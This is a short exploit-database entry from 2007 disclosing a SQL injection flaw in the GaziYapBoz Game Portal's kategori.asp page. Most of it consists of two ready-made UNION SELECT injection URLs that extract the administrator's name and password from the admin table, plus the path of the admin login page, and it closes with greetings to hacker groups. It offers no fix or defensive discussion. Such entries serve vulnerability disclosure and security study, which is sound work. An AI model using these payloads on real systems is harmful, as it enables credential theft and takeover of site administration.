GaziYapBoz Game Portal - 'kategori.asp' SQL Injection

EDB-ID:

3437


Platform:

ASP

Published:

2007-03-08

#Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# milw0rm.com [2007-03-08]